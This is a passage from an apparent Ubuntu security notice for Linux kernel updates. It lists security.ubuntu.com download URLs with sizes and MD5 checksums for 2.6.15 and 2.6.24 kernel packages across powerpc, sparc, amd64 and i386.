http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     7060 4dc37eb02f6742808d26548a0ecb79ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    60382 24f359b6596789e61bbd001fd90c5a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    70426 8128abfff4f7ab8f32370a151dd27602
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   128552 86b1f62ab4d815af984fea8e0556fd0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   157952 675fec1992efcfa46cf0043e3507513d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   108160 eb2056a3b1940d3b3b27adcb8df1e68c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   126140 d1c23f615d6aeebe6594386d424ef7f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    87300 47e6e945e4651347cde5e76965131a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    93364 802c107ffe461103294fd58c1d12b139
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  2014806 d15cb3eea9558346c08029994feba932
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1988698 47499eab748909cbc24d41eb251bd57e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   104128 3e626e3e4c59a16338d00953874420d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   115796 5ff731f56aac5f43999c70e98d250892
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    12740 3b4d8bea0a856073ea6116bcdafed867
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    14446 9796772a49dc9688c64fde72be43f446
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    39954 6491b77cf30155c06612af32748ab26d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    41542 c99144c5929ec38a934702c2e041e0df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   149346 8d4aab9ae6c9f04ed1d4968708c14c88
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   168124 72dcb481cb91bfb750e7d7cb3b2bab4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    42314 7f7347a9dfcafcc43469d4d4364c1af8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    44916 2641528d804b1c1dd2f7d0e04f3a044b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   320330 6aff8b286b3ddf7dfc33ce99f504f1e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   324878 11ab2f5d09092b3f9797e673e413ab2c

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    50478 116bcbef4cbedbce5345d410424b6463
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     2354 df747032ea1217e02817c8dec92bcd75
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    40376 4337e5c50ab6220a5ee46b46f98669f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   110558 bfa3abba4946456a8f6d99a1a405f72e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    41214 7fa46c5fc72ef82e476804fcb3c3560e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   104226 3208d817b562267bba9539f854fe388b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     7436 87a0b43fa978113a74cb8e79b8dd4774
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   149312 9341cb99291093f7e5624f6e9f3c9daa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1712908 f0e841e92ee8a38b75543485f86a2b4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb
  Size/MD5:   771900 6c8197f994e366ec847414a13eb7b906
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb
  Size/MD5:   771444 46d3fb1d75439b65635bfaac6d653d74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_sparc.deb
  Size/MD5:  6963130 11d85b5ba6c6e5d333b860b7a5163b5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb
  Size/MD5: 15016950 1f36bbfe3b2db1e844d76d984a4a661a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb
  Size/MD5: 14832050 bc36836f43a994fb29143301526c2ace
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     7436 76dc77e08053d579849c4c09c8328b80
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   248770 dd30a7c1c47f07012b5bf0ee7fd16ca4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   212536 bf4b63251214a4622ce5a55f902203bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1048476 575854b9cc92279f65c4acfa0a60e43c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1482448 de80e93cfd56c729a74ded3b97946846
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    10114 4a3f85652ffd60eb4a94ab3093227db2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    40176 660660949865f2de6403ad165b9faa60
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     9368 65475425005847418b7d9380e4fed4a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    61402 264bfd4456975f04ca592789983eb77b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   163278 1df17d4edff53b6e1102ab15ff671216
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    64092 52a9af94cf9a1ace816d3b1b727738dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1235410 e44d8dda7d391021570cc0a826f6c5fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    59308 00fbe909018b76d099f47d9c39d72a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    37426 56112905d8bef55a258eb7aa59cb946b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   280130 fb9c0d56db0d19a09524d36af51f4687

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.diff.gz
  Size/MD5:  4813262 c1da8b33fcf63ededcc7ab2498e4c964
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.dsc
  Size/MD5:     2258 f1f1a3629c40ac86e1b6172f2f3966cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-28.70_all.deb
  Size/MD5:  4932582 c75bb688dfed58df39fa72161bc6471c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28_2.6.24-28.70_all.deb
  Size/MD5:  8149016 f80aeb18376bc0371a80a5acbbc4f042
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-28.70_all.deb
  Size/MD5:   100904 3996ef6a1321c852676912837f7d9896
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-28.70_all.deb
  Size/MD5: 46982104 a90fab943db79ec907e1cbf97c869092

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    28610 b861f6c6aa20728c83bbc0ec9ae239a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   224204 bd768c83d861caa00758232ec48f21f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    52648 663642186c3344039e31afcf1d88b48f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    40640 9ea576c926e3b3b68dd2f98f2c7b634f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    48646 d00ff865f10bd95cfe0d7f556fd96135
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    86332 d969a4a0657104af706645718743733d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    36314 98ac23e9bc91e2a54840f86bdd6e96ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   648768 458b6968f63bc8134e62c47e8a9be732
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   209944 04c1a8cd3bf7a25da0e78fbb8f90d111
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    39192 254eeda71366bfe9c3e4f7b56828f526
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    67984 29f9c63dbfd2f8f86ea71b2e9cae813b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   145448 689d507482ed8b85fd15f33d8bdfe737
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   287268 73a2edaf7afc4a65aa77e8995ed3b3e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:  2130812 20affc23d001c3a542b0adfa947e12eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_amd64.deb
  Size/MD5:   675578 f6d7fe8d4eda5ed7e6e4edd2ab9fa2ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_amd64.deb
  Size/MD5:  1254372 28e7eaca202b7aefa71b0e3e943d98a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_amd64.deb
  Size/MD5:  1276462 1d5f451c0c43c965d585e34d0799dc77
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_amd64.deb
  Size/MD5:   675490 1ea0767f5025162a3350687d3977c1a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_amd64.deb
  Size/MD5:  1086568 643d57e3d1cbb403787588819535ba3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_amd64.deb
  Size/MD5: 17815434 ca2be2f4f00cd6c412beec384e6569d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_amd64.deb
  Size/MD5: 17785084 624ae6cd24926052048734802477e137
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_amd64.deb
  Size/MD5: 21063276 fa087ed3f1b02b40b09dcfe89d45f73d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_amd64.deb
  Size/MD5: 21435602 6dac3b165e31f9409240389cd33138ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_amd64.deb
  Size/MD5:   709144 770ddfa645769cb3bbd36fd3213da463
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   263670 68ff4af3d2752a5d3965eff926890319
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   176414 a2b597847575190f35acc23e2230fee8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   254100 6c70433fbed951cd97797092952efc2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:  1642020 5664065e58da802295747e9c7c21b698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   143712 9a418be17d9afe53a5c7add5e90a28b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   164464 325e24198ba529100a5840ae1b0e2550
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   115852 6b155bc2fa1e59e144c57fad46a9acdd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    35060 73537c193f7fa3caf4007cc7348e9d28
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    64402 7760e6acdb5dda4b37ffd2fdd33ae658
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    69710 e6bcf4e9b94aaf83a2fd640e7364a34e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    21596 805227e007ba9dee7f04bf59aafb050c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:     8616 16e18d90244e835d0cbc5ae9c571c641
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    57230 06f30cc1a982671b53e5ca5c8d362aea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   103038 e571751777dc6cdc16f498add459f799
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:  1212558 c1a1947cc4f37c7b1479ece74e399a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    45496 6f25ee67a63dfc757d82883b8162b268
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    12774 87bfa70fab065ed960c4249106df6219
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   499398 f50e6a5d591d124ea04b8e5c19683404
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    75052 f0253d9acbcf3f06cd0da60e7457c50d
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_amd64.deb
  Size/MD5: 19262374 07ff7910c9e0ae1589fcaf93c1fb8acd
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_amd64.deb
  Size/MD5: 17913162 6999b14fbb5cc112d64c9bfcbf475477
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_amd64.deb
  Size/MD5: 18914794 a43117499bda8bccd98e185bde493749

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    23686 18bd8e09ccdca0f38c09197958ac5524
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    26796 46c1f483a8ad20c903e6354c68ee3389
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   218826 7a0c579b79c0d53f5d8cb405070c7e38
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   220472 70a3539d19ebf9be4e7aed9141f64945
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    51924 ed915e6f13fa7a452e37810ed2589698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    52058 9c19d0affe1777b36dbcd835e95a72b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    38326 a9041a4039d457f26060784b609ba48c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    39078 393f5a163cbad634e8ba8ff17866e315
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    45994 0b5101e40b38f62278cca75a543f88d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    46166 8a3cd2550f4bc59515ee72f87d40e093
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    83250 4f57f0e75de3e3884c350df0a92646d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    83650 a29ba07db6908cc0dcfc6fa69c5d154f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    32396 e09725b6cd2edb1c99b954931ea30a3d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    32674 74a1c018bdd24a81f56e2f5ca76c86f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   637742 bb0af8a13cbf714fbbe316376f843bbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   655916 503b7879d411c641f10d813d027e745c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   209854 ff86bb3742203e7bd44a5db87ce40361
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   213616 aa25de1453a8512619d62d66a98c783b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    46562 90e5237cdfc6e54b145b6e13ffdda47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    47604 a9d621b700d5b56e23025357604f0487
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    62268 e00dd9915a2e92d3b4a7d7908b2194fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    63630 8d854a96bc559b4d87294ece7e79d03c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   130542 2e4009a596d1672486dee5aa3c8b2423
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   137028 da2ceb3ce4e2f0dcfd70cafba0d3eade
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   279082 63e74d6a553fb1725f661340eec544a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   277692 6cad6bee962600c17282346550b40ddd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:  2012888 14bce971d0e20c69df861da2a2b960bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:  2089262 98b4049286d60bfd3473da45ce332991
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-386_2.6.24-28.70_i386.deb
  Size/MD5:   656922 58714a2e1fcc17e1fd89740aeee114f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_i386.deb
  Size/MD5:   659532 f17700bc40e9e3e0d003225207da7c61
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_i386.deb
  Size/MD5:  1244404 a00ae4dde9d6a921b17bda0e2fd86790
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_i386.deb
  Size/MD5:  1264690 1e454c5f6a51b34c6f336d69269ba277
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_i386.deb
  Size/MD5:   661210 385cebd0decb92d51bbea38c77f4ea27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-virtual_2.6.24-28.70_i386.deb
  Size/MD5:   563854 3806e67c965a034bd8fd0873914baad5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_i386.deb
  Size/MD5:  1061360 2a3ad99a1b108041578893878a8637a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-386_2.6.24-28.70_i386.deb
  Size/MD5: 18384498 e8f5c0e7addd09241b7ef435a727637a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_i386.deb
  Size/MD5: 18402466 0a06a6aad92ccebecf63da2c5966d277
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_i386.deb
  Size/MD5: 18519954 bf9ef7f9445cfc22787b17d74d8d5900
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-virtual_2.6.24-28.70_i386.deb
  Size/MD5:  8734136 0a8147e9d7bee6bc870bdc3208279eba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-386_2.6.24-28.70_i386.deb
  Size/MD5: 25549924 8d030bc507ceb77d0fc6ae4bef22e118
